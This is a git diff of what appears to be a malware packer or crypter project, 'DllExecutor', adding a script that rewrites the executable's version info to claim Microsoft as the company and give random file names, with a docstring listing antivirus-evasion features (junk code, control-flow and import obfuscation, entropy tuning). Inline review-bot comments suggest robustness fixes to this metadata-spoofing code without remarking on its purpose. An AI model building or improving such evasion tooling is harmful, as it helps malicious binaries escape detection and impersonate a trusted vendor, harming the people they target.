diff --git a/.gitignore b/.gitignore
index 4d361c9..36f8c1f 100644
--- a/.gitignore
+++ b/.gitignore
@@ -4,3 +4,5 @@
__pycache__
Debug
Release
+config.h
+sample.h
\ No newline at end of file
diff --git a/DllExecutor.rc b/DllExecutor.rc
new file mode 100644
index 0000000..d96ce7e
--- /dev/null
+++ b/DllExecutor.rc
@@ -0,0 +1,100 @@
+// Microsoft Visual C++ generated resource script.
+//
+#include "resource.h"
+
+#define APSTUDIO_READONLY_SYMBOLS
+/////////////////////////////////////////////////////////////////////////////
+//
+// Generated from the TEXTINCLUDE 2 resource.
+//
+#include "winres.h"
+
+/////////////////////////////////////////////////////////////////////////////
+#undef APSTUDIO_READONLY_SYMBOLS
+
+/////////////////////////////////////////////////////////////////////////////
+// Français (France) resources
+
+#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_FRA)
+LANGUAGE LANG_FRENCH, SUBLANG_FRENCH
+#pragma code_page(1252)
+
+#ifdef APSTUDIO_INVOKED
+/////////////////////////////////////////////////////////////////////////////
+//
+// TEXTINCLUDE
+//
+
+1 TEXTINCLUDE
+BEGIN
+ "resource.h\0"
+END
+
+2 TEXTINCLUDE
+BEGIN
+ "#include ""winres.h""\r\n"
+ "\0"
+END
+
+3 TEXTINCLUDE
+BEGIN
+ "\r\n"
+ "\0"
+END
+
+#endif // APSTUDIO_INVOKED
+
+
+/////////////////////////////////////////////////////////////////////////////
+//
+// Version
+//
+
+VS_VERSION_INFO VERSIONINFO
+ FILEVERSION 1,0,0,1
+ PRODUCTVERSION 1,0,0,1
+ FILEFLAGSMASK 0x3fL
+#ifdef _DEBUG
+ FILEFLAGS 0x1L
+#else
+ FILEFLAGS 0x0L
+#endif
+ FILEOS 0x40004L
+ FILETYPE 0x1L
+ FILESUBTYPE 0x0L
+BEGIN
+ BLOCK "StringFileInfo"
+ BEGIN
+ BLOCK "040c04b0"
+ BEGIN
+ VALUE "CompanyName", "Microsoft"
+ VALUE "FileDescription", "vhasdzagtqqfokxkxnwj"
+ VALUE "FileVersion", "1.0.0.1"
+ VALUE "InternalName", "apwjxnl.exe"
+ VALUE "LegalCopyright", "Copyright (C) 2023"
+ VALUE "OriginalFilename", "cwresrj.exe"
+ VALUE "ProductName", "fkdhtat.exe"
+ VALUE "ProductVersion", "1.0.0.1"
+ END
+ END
+ BLOCK "VarFileInfo"
+ BEGIN
+ VALUE "Translation", 0x40c, 1200
+ END
+END
+
+#endif // Français (France) resources
+/////////////////////////////////////////////////////////////////////////////
+
+
+
+#ifndef APSTUDIO_INVOKED
+/////////////////////////////////////////////////////////////////////////////
+//
+// Generated from the TEXTINCLUDE 3 resource.
+//
+
+
+/////////////////////////////////////////////////////////////////////////////
+#endif // not APSTUDIO_INVOKED
+
diff --git a/DllExecutor.vcxproj b/DllExecutor.vcxproj
index 4a37fac..2428678 100644
--- a/DllExecutor.vcxproj
+++ b/DllExecutor.vcxproj
@@ -117,6 +117,7 @@
false
/NXCOMPAT:no %(AdditionalOptions)
%(AdditionalDependencies)
+ true
@@ -156,8 +157,12 @@
+
+
+
+
diff --git a/DllExecutor.vcxproj.filters b/DllExecutor.vcxproj.filters
index de85741..7ec23b8 100644
--- a/DllExecutor.vcxproj.filters
+++ b/DllExecutor.vcxproj.filters
@@ -26,5 +26,13 @@
Fichiers d%27en-tête
+
+ Fichiers d%27en-tête
+
+
+
+
+ Fichiers de ressources
+
\ No newline at end of file
diff --git a/gui.py b/gui.py
index f79d32c..55b0782 100644
--- a/gui.py
+++ b/gui.py
@@ -13,7 +13,6 @@ TODO :
- Good entropy
- Good Section sizes
- Add resources
- - Change PE metadata (company, description, etc...)
- Random Windows API calls (help)
- Code signing (optional)
@@ -22,12 +21,14 @@ Done :
- Junk code
- Control flow
- IAT obfuscation (adding "normal" imports in addition to the others)
+ - Change PE metadata (company, description, etc...)
"""
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtWidgets import QApplication
from PyQt5.QtCore import QCoreApplication
from obfuscation import obfuscate
+from metadata import change_metadata
import os, shutil
class Ui_mainWindow(object):
@@ -168,6 +169,13 @@ class Ui_mainWindow(object):
self.label_2.setText("done.")
QCoreApplication.processEvents()
+ self.label_2.setText("Changing metadata...")
+ QCoreApplication.processEvents()
+ change_metadata()
+
+ self.label_2.setText("done.")
+ QCoreApplication.processEvents()
+
self.label_2.setText("Compiling...")
QCoreApplication.processEvents()
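Review bot: `change_metadata()` is called with no error handling, and the label is set to "done." unconditionally right after it. The function does file I/O on the relative path `DllExecutor.rc`, so a missing file or an unexpected working directory raises out of this handler. If this method is connected as a Qt slot, an unhandled exception under PyQt5 typically terminates the application. Wrapping the call as `try: change_metadata()` / `except OSError as e: self.label_2.setText(f"metadata failed: {e}"); return` would keep the status label truthful. The enclosing method starts and ends outside the hunk.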
diff --git a/metadata.py b/metadata.py
new file mode 100644
index 0000000..79e3fae
--- /dev/null
+++ b/metadata.py
@@ -0,0 +1,27 @@
+from randomness import *
+
+def change_metadata() :
+ f = open("DllExecutor.rc", "r")
+ f_c = f.readlines()
+ f.close()
+
+ o = open("DllExecutor.rc", "w")
+ for line in f_c :
+ if "CompanyName" in line :
+ line = f'\t\t\tVALUE "CompanyName", "Microsoft"\n'
+
+ elif "FileDescription" in line :
+ line = f'\t\t\tVALUE "FileDescription", "{GetRandomString(20)}"\n'
+
+ elif "InternalName" in line :
+ line = f'\t\t\tVALUE "InternalName", "{GetRandomString(7)}.exe"\n'
+
+ elif "OriginalFilename" in line :
+ line = f'\t\t\tVALUE "OriginalFilename", "{GetRandomString(7)}.exe"\n'
+
+ elif "ProductName" in line :
+ line = f'\t\t\tVALUE "ProductName", "{GetRandomString(7)}.exe"\n'
+
+ o.write(line)
+
+ o.close()
\ No newline at end of file
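Review bot: `change_metadata()` reopens `DllExecutor.rc` in `"w"` mode before the replacement lines are computed, so an exception inside the loop (for example from `GetRandomString`) leaves the resource script truncated, and neither handle is closed on that path. Both `open()` calls also omit `encoding`, while the .rc declares `#pragma code_page(1252)` and contains non-ASCII text, so the result depends on the interpreter's locale default. The `"CompanyName" in line` style tests match any line containing the key, including comments; anchoring on the `VALUE "…"` prefix would be stricter. `from randomness import *` also hides where `GetRandomString` comes from. Because the tracked .rc is rewritten in place, every run dirties the working tree.

```python
from randomness import GetRandomString  # presumably defined there; replaces the wildcard import

def change_metadata():
    # cp1252 mirrors the #pragma code_page(1252) in the .rc; confirm the file's real encoding
    with open("DllExecutor.rc", "r", encoding="cp1252") as src:
        lines = src.readlines()

    # Build the whole replacement first so a failure cannot leave a truncated .rc
    rewritten = []
    for line in lines:
        # … unchanged: CompanyName / FileDescription / InternalName / OriginalFilename / ProductName chain …
        rewritten.append(line)

    with open("DllExecutor.rc", "w", encoding="cp1252") as dst:
        dst.writelines(rewritten)
```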
diff --git a/resource.h b/resource.h
new file mode 100644
index 0000000..773560c
--- /dev/null
+++ b/resource.h
@@ -0,0 +1,14 @@
+//{{NO_DEPENDENCIES}}
+// Microsoft Visual C++ generated include file.
+// Used by DllExecutor.rc
+
+// Valeurs par défaut suivantes des nouveaux objets
+//
+#ifdef APSTUDIO_INVOKED
+#ifndef APSTUDIO_READONLY_SYMBOLS
+#define _APS_NEXT_RESOURCE_VALUE 101
+#define _APS_NEXT_COMMAND_VALUE 40001
+#define _APS_NEXT_CONTROL_VALUE 1001
+#define _APS_NEXT_SYMED_VALUE 101
+#endif
+#endif